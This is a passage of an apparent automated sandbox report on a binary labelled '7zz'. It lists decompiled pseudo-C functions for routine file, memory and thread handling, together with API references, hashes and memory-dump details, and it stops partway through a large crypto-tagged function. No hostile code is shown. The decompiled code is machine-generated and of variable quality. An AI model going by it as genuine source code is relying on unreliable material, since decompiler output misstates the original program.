                                                                                                                                    • Instruction Fuzzy Hash: E5D05E31A416226EE6322762DC4AA2F22A49F00754B01002FF8848A260FF598C81419F
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0043394A Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                    			E0043394A(void* __ecx) {
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t12;

				L0046B890(0x477baa, _t12);
				_push(__ecx);
				_push(0x270);
				_t10 = L004079F2();
				 *((intOrPtr*)(_t12 - 0x10)) = _t10;
				_t7 = 0;
				_t15 = _t10;
				 *((intOrPtr*)(_t12 - 4)) = 0;
				if(_t10 != 0) {
					_t7 = E0042A3CD(_t10, _t15); // executed
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t12 - 0xc));
				return _t7;
			}






                                                                                                                                    0x0043394f
                                                                                                                                    0x00433954
                                                                                                                                    0x00433955
                                                                                                                                    0x00433960
                                                                                                                                    0x00433962
                                                                                                                                    0x00433965
                                                                                                                                    0x00433967
                                                                                                                                    0x00433969
                                                                                                                                    0x0043396c
                                                                                                                                    0x0043396e
                                                                                                                                    0x0043396e
                                                                                                                                    0x00433976
                                                                                                                                    0x0043397e

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0043394F
                                                                                                                                      • Part of subcall function 0042A3CD: __EH_prolog.LIBCMT ref: 0042A3D2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: 547c0573142f1e26886b21109ff566160c246038c21b365f3525819d13d8d867
                                                                                                                                    • Instruction ID: 784fa2737f9a3aecb95f3671ac57fc4e3df94eaba76e5e114e4ffca640bbc759
                                                                                                                                    • Opcode Fuzzy Hash: 547c0573142f1e26886b21109ff566160c246038c21b365f3525819d13d8d867
                                                                                                                                    • Instruction Fuzzy Hash: 80D017B1A442159BDB08FBA8944236D72A1AB08308F10857FA41AE3780EB785900866A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040B154 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040B154(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindClose(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}






                                                                                                                                    0x0040b155
                                                                                                                                    0x0040b157
                                                                                                                                    0x0040b15c
                                                                                                                                    0x0040b170
                                                                                                                                    0x0040b173
                                                                                                                                    0x0040b15e
                                                                                                                                    0x0040b15f
                                                                                                                                    0x0040b167
                                                                                                                                    0x0040b16d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040b169
                                                                                                                                    0x0040b16c
                                                                                                                                    0x0040b16c
                                                                                                                                    0x0040b167

                                                                                                                                    APIs
                                                                                                                                    • FindClose.KERNELBASE(00000000,?,0040B18C), ref: 0040B15F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseFind
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                    • Opcode ID: 44b45b29d53ae0ee441c7631a48af92bc4367c4c071d9c8d09f5d2f54756129b
                                                                                                                                    • Instruction ID: b21785a81a83a5848f3eefaff4503489f3c43cb4ff3f3a84b902145481c2820f
                                                                                                                                    • Opcode Fuzzy Hash: 44b45b29d53ae0ee441c7631a48af92bc4367c4c071d9c8d09f5d2f54756129b
                                                                                                                                    • Instruction Fuzzy Hash: 14D0123110426186CA641E3C78589C733D89A463B03214B6AF4B4D72E1D3749CD356EC
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401917 Relevance: 1.5, APIs: 1, Instructions: 16COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                    			E00401917(intOrPtr* __ecx) {
				char* _v8;
				int _t3;

				_push(__ecx);
				 *__ecx = 0x47a258; // executed
				_t3 = SetConsoleCtrlHandler(E004018DA, 0); // executed
				if(_t3 == 0) {
					_v8 = "SetConsoleCtrlHandler fails";
					return L0046B8F4( &_v8, 0x47cf70);
				}
				return _t3;
			}





                                                                                                                                    0x0040191a
                                                                                                                                    0x00401922
                                                                                                                                    0x00401928
                                                                                                                                    0x00401930
                                                                                                                                    0x0040193b
                                                                                                                                    0x00000000
                                                                                                                                    0x00401942
                                                                                                                                    0x00401948

                                                                                                                                    APIs
                                                                                                                                    • SetConsoleCtrlHandler.KERNELBASE(004018DA,00000000,?,?,00405F11), ref: 00401928
                                                                                                                                      • Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ConsoleCtrlExceptionHandlerRaise
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 118816144-0
                                                                                                                                    • Opcode ID: 7d417b143ea1433f04c1f19a4f714dece2fd5a2579662ce84d2d8607feb3290c
                                                                                                                                    • Instruction ID: 6ced6f053643f7caf5f562c5cf66968f1a01d4a1bbfb89d95e4470d53f11f31c
                                                                                                                                    • Opcode Fuzzy Hash: 7d417b143ea1433f04c1f19a4f714dece2fd5a2579662ce84d2d8607feb3290c
                                                                                                                                    • Instruction Fuzzy Hash: 21D05BB024030876D710EF958D06B4D369CDB81748F20809BE104B22D1E7F9A500571E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040B9C0 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040B9C0(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindCloseChangeNotification(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}






                                                                                                                                    0x0040b9c1
                                                                                                                                    0x0040b9c3
                                                                                                                                    0x0040b9c8
                                                                                                                                    0x0040b9dc
                                                                                                                                    0x0040b9df
                                                                                                                                    0x0040b9ca
                                                                                                                                    0x0040b9cb
                                                                                                                                    0x0040b9d3
                                                                                                                                    0x0040b9d9
                                                                                                                                    0x00000000
                                                                                                                                    0x0040b9d5
                                                                                                                                    0x0040b9d8
                                                                                                                                    0x0040b9d8
                                                                                                                                    0x0040b9d3

                                                                                                                                    APIs
                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,0040B938,000000FF,00000000,00000080,0040BC55,?,00000000,0040B46E,?,59@), ref: 0040B9CB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                    • Opcode ID: 33fa7bc332402748847c426bb7038baaea435e55007e32936245ae0630d27a3e
                                                                                                                                    • Instruction ID: 00a41a6e43d9e9d2736f99314ed8b7868d2ac66bf7d75e366eb682c8f7b18308
                                                                                                                                    • Opcode Fuzzy Hash: 33fa7bc332402748847c426bb7038baaea435e55007e32936245ae0630d27a3e
                                                                                                                                    • Instruction Fuzzy Hash: 84D0127110416146DE642E3D7C445C737D8AA423303210B6BF0B5D32E1D3748CD356D8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040BD82 Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E0040BD82(void** __ecx, FILETIME* _a4, FILETIME* _a8, FILETIME* _a12) {
				signed int _t4;

				_t4 = SetFileTime( *__ecx, _a4, _a8, _a12); // executed
				asm("sbb eax, eax");
				return  ~( ~_t4);
			}




                                                                                                                                    0x0040bd90
                                                                                                                                    0x0040bd98
                                                                                                                                    0x0040bd9c

                                                                                                                                    APIs
                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 0040BD90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileTime
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1425588814-0
                                                                                                                                    • Opcode ID: 159763ee70248e45816b5ed0686b6e88efdf274a22e637b9fc2352e1e560d6e6
                                                                                                                                    • Instruction ID: 904542211cf95c1dba31585a344c430934b25bd4ea8d40f4864e79ca3744c005
                                                                                                                                    • Opcode Fuzzy Hash: 159763ee70248e45816b5ed0686b6e88efdf274a22e637b9fc2352e1e560d6e6
                                                                                                                                    • Instruction Fuzzy Hash: 62C04C36158105FF8F020F70DC04C1EBBA6AB95711F10CA18B259C4070C7338034EB02
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00467AD0 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00467AD0(intOrPtr* __ecx, intOrPtr __edx, char _a4) {
				intOrPtr _t4;
				long _t5;
				intOrPtr* _t12;

				_t12 = __ecx;
				_t4 = E0046CD08(0, 0, __edx, _a4, 0,  &_a4); // executed
				 *_t12 = _t4;
				if(_t4 == 0) {
					_t5 = GetLastError();
					if(_t5 == 0) {
						return 1;
					}
					return _t5;
				} else {
					return 0;
				}
			}






                                                                                                                                    0x00467ad8
                                                                                                                                    0x00467ae4
                                                                                                                                    0x00467aec
                                                                                                                                    0x00467af1
                                                                                                                                    0x00467af8
                                                                                                                                    0x00467b00
                                                                                                                                    0x00000000
                                                                                                                                    0x00467b02
                                                                                                                                    0x00467b07
                                                                                                                                    0x00467af3
                                                                                                                                    0x00467af5
                                                                                                                                    0x00467af5

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0046CD08: CreateThread.KERNELBASE ref: 0046CD49
                                                                                                                                      • Part of subcall function 0046CD08: GetLastError.KERNEL32(?,00467AE9,00000000,00000000,004148ED,?,00000000,?,?,00414677,?,?), ref: 0046CD53
                                                                                                                                    • GetLastError.KERNEL32(?,?,00414677,?,?), ref: 00467AF8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$CreateThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 665435222-0
                                                                                                                                    • Opcode ID: 75c33af1d3ad033ecb797aba507411330867c6b5fb6462af91c85880dadd199e
                                                                                                                                    • Instruction ID: f2b2db5cd6f09a71537b1524ed132628cfc4aafc29f8b6fc8c24ade46cb63582
                                                                                                                                    • Opcode Fuzzy Hash: 75c33af1d3ad033ecb797aba507411330867c6b5fb6462af91c85880dadd199e
                                                                                                                                    • Instruction Fuzzy Hash: 9CE086B22042015AE3109A549C05F6766989B90B45F04443EB944C6180F6A49950C76A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004585C0 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004585C0(long __ecx) {
				void* _t1;

				if(__ecx != 0) {
					_t1 = VirtualAlloc(0, __ecx, 0x1000, 4); // executed
					return _t1;
				} else {
					return 0;
				}
			}




                                                                                                                                    0x004585c2
                                                                                                                                    0x004585d1
                                                                                                                                    0x004585d7
                                                                                                                                    0x004585c4
                                                                                                                                    0x004585c6
                                                                                                                                    0x004585c6

                                                                                                                                    APIs
                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,0048DE00,00001000,00000004,00413C47,0048DE00,00000000,00414B97,00000500,0048DE00,00000000,00490AB0), ref: 004585D1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: 60f2cb083d3e1da89fbc138163c0eb26e01a85e12df0a1ae00077eedd1479cf7
                                                                                                                                    • Instruction ID: c1be663b654be8f4f03ee9fe28526b1f2e61089ce9361c0db0236efe8358a087
                                                                                                                                    • Opcode Fuzzy Hash: 60f2cb083d3e1da89fbc138163c0eb26e01a85e12df0a1ae00077eedd1479cf7
                                                                                                                                    • Instruction Fuzzy Hash: BFB012B039124475FE6843344C0BF6F2140A390B47F50406CB705E80C4FFE05840541D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004585E0 Relevance: 1.3, APIs: 1, Instructions: 7COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004585E0(void* __ecx) {
				void* _t1;
				int _t2;

				if(__ecx != 0) {
					_t2 = VirtualFree(__ecx, 0, 0x8000); // executed
					return _t2;
				}
				return _t1;
			}





                                                                                                                                    0x004585e2
                                                                                                                                    0x004585ec
                                                                                                                                    0x00000000
                                                                                                                                    0x004585ec
                                                                                                                                    0x004585f2

                                                                                                                                    APIs
                                                                                                                                    • VirtualFree.KERNELBASE(0040F696,00000000,00008000,00413C3C,0048DE00,00000000,00414B97,00000500,0048DE00,00000000,00490AB0), ref: 004585EC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                    • Opcode ID: 66ab59525338a2af16dc22d106436c8a083152c3c5af49293173989fc1d300f5
                                                                                                                                    • Instruction ID: 99068d3d514b32bd65c0f8a450bbacd2dc59915ab1aca7adb646860191089de3
                                                                                                                                    • Opcode Fuzzy Hash: 66ab59525338a2af16dc22d106436c8a083152c3c5af49293173989fc1d300f5
                                                                                                                                    • Instruction Fuzzy Hash: 9DB012F034130131FD3803110E05B1B10005740702E94802C7506B40C14D589804850C
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 00441925 Relevance: 20.4, APIs: 10, Strings: 1, Instructions: 1131COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                    			E00441925(intOrPtr __ecx, signed int __edx) {
				void* __edi;
				intOrPtr _t641;
				intOrPtr* _t642;
				int _t650;
				char _t652;
				intOrPtr* _t654;
				intOrPtr _t669;
				signed int _t681;
				int _t700;
				intOrPtr* _t723;
				intOrPtr* _t729;
				int _t730;
				intOrPtr* _t731;
				intOrPtr* _t739;
				intOrPtr* _t744;
				intOrPtr* _t746;
				intOrPtr* _t754;
				intOrPtr* _t758;
				signed int _t766;
				intOrPtr* _t773;
				intOrPtr* _t775;
				intOrPtr* _t783;
				int _t788;
				intOrPtr _t790;
				struct _CRITICAL_SECTION* _t793;
				intOrPtr _t796;
				signed int _t797;
				void* _t805;
				int _t845;
				intOrPtr* _t852;
				int _t856;
				signed int _t857;
				int _t858;
				intOrPtr* _t865;
				intOrPtr* _t870;
				intOrPtr _t872;
				intOrPtr* _t880;
				intOrPtr* _t898;
				signed int _t902;
				signed int _t903;
				void* _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				intOrPtr* _t911;
				int _t928;
				intOrPtr _t931;
				signed int _t934;
				intOrPtr _t963;
				void* _t985;
				signed int _t996;
				signed int _t1133;
				signed int _t1135;
				signed int _t1154;
				signed int _t1155;
				void* _t1158;
				signed int _t1159;
				intOrPtr* _t1160;
				intOrPtr _t1161;
				struct _CRITICAL_SECTION* _t1163;
				void* _t1164;
				int _t1165;
				signed int _t1170;
				intOrPtr* _t1172;
				int _t1173;
				intOrPtr _t1174;
				signed int _t1175;
				int _t1176;
				intOrPtr* _t1177;
				signed int _t1178;
				intOrPtr _t1179;
				intOrPtr _t1180;
				intOrPtr _t1182;
				intOrPtr _t1183;
				intOrPtr _t1184;
				void* _t1186;
				void* _t1188;
				void* _t1189;
				void* _t1198;
				void* _t1205;

				_t1146 = __edx;
				L0046B890(E00478DCE, _t1186);
				_t1189 = _t1188 - 0x3a0;
				 *((intOrPtr*)(_t1186 - 0x24)) = __ecx;
				_t931 =  *((intOrPtr*)(_t1186 + 0x10));
				_t928 = 0;
				_t1154 = 0;
				 *((intOrPtr*)(_t1186 - 0x60)) = __edx;
				 *(_t1186 - 0x18) = 0;
				 *(_t1186 - 0x14) = 0;
				 *((intOrPtr*)(_t1186 - 0x30)) = 0;
				 *(_t1186 - 0x2c) = 0;
				 *((intOrPtr*)(_t1186 - 0x48)) = 0;
				 *(_t1186 - 0x44) = 0;
				if( *((intOrPtr*)(_t931 + 8)) <= 0) {
					L6:
					_t641 =  *((intOrPtr*)(_t1186 + 0x18));
					_t1194 = _t641 - _t928;
					if(_t641 != _t928) {
						 *(_t1186 - 0x18) =  *(_t1186 - 0x18) +  *((intOrPtr*)(_t641 + 4));
						asm("adc [ebp-0x14], ebx");
					}
					_t642 =  *((intOrPtr*)(_t1186 + 0x1c));
					_t1155 = 1;
					 *(_t1186 - 0x18) =  *(_t1186 - 0x18) + _t1155;
					asm("adc [ebp-0x14], ebx");
					 *((intOrPtr*)( *_t642 + 0xc))(_t642,  *(_t1186 - 0x18),  *(_t1186 - 0x14));
					_t1170 =  *(_t1186 + 0x14);
					E00439D90(_t1186 - 0x3ac, _t1194, _t1170);
					_t934 =  *(_t1170 + 0x40);
					 *(_t1186 - 4) = _t1155;
					 *(_t1186 - 0x18) = _t928;
					 *(_t1186 - 0x14) = _t928;
					 *(_t1186 - 0x20) = _t934;
					if(_t934 > 0x400) {
						 *(_t1186 - 0x20) = 0x400;
					}
					E0043DF8F(_t1186 - 0x2ec);
					 *(_t1186 - 4) = 2;
					if(_t1170 == _t928) {
						L12:
						 *(_t1186 - 0xd) = _t928;
						L13:
						_t1198 =  *(_t1186 - 0x2c) - _t928;
						if(_t1198 <= 0 && (_t1198 < 0 ||  *((intOrPtr*)(_t1186 - 0x30)) <= _t1155)) {
							 *(_t1186 - 0xd) = _t928;
						}
						if( *(_t1186 - 0xd) == _t928) {
							L37:
							_push( *((intOrPtr*)(_t1186 + 0x1c)));
							_push( *((intOrPtr*)(_t1186 + 0x18)));
							_push(_t1170);
							_push( *((intOrPtr*)(_t1186 + 0x10)));
							_push( *((intOrPtr*)(_t1186 + 0xc)));
							_push( *(_t1186 + 8));
							_t928 = L00443231( *((intOrPtr*)(_t1186 - 0x24)),  *((intOrPtr*)(_t1186 - 0x60)));
							goto L124;
						} else {
							_t652 =  *((intOrPtr*)( *((intOrPtr*)(_t1170 + 0xc))));
							 *((char*)(_t1186 - 0x39)) = _t652;
							if(_t652 != _t928) {
								L21:
								if(_t652 != 0xc) {
									L33:
									if( *((char*)(_t1186 - 0x39)) == 0xe) {
										_t902 =  *(_t1186 - 0x20);
										_t1133 = (0 |  *((intOrPtr*)(_t1170 + 0x20)) - _t928 > 0x00000000) + 1;
										_t903 = _t902 / _t1133;
										_t1146 = _t902 % _t1133;
										 *(_t1186 - 0x2ac) = _t1133;
										 *(_t1186 - 0x20) = _t903;
										if(_t903 <= _t1155) {
											 *(_t1186 - 0xd) = _t928;
										}
									}
									L36:
									if( *(_t1186 - 0xd) != _t928) {
										E00405B9F(_t1186 - 0x5c);
